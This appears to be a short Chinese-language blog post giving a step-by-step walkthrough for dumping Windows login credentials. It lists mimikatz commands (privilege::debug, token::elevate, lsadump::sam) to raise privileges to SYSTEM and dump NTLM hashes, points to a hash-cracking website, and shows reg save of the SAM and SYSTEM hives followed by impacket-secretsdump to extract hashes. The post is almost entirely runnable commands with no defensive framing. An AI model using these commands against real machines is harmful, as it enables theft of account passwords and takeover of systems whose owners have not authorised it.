Windows登陆密码获取
Mimikatz
开启mimikatz。以管理员权限打开cmd,进入目录下
1 | mimikatz.exe |
验证
1 | privilege::debug |
(如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)
提权至 NT AUTHORITY\SYSTEM
1 | token::elevate |
获取到NTLM的hash
1 | lsadump::sam |
NTLM解密
1 | https://www.cmd5.com |
hashcat
获取加密哈希值
1 | reg save hklm\sam Q:\sam.hive |
获取密钥文件
1 | reg save hklm\system Q:\system.hive |
分析sam文件,提取NTLM Hash
1 | impacket-secretsdump -sam sam.hive -system system.hive LOCAL |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 -><- !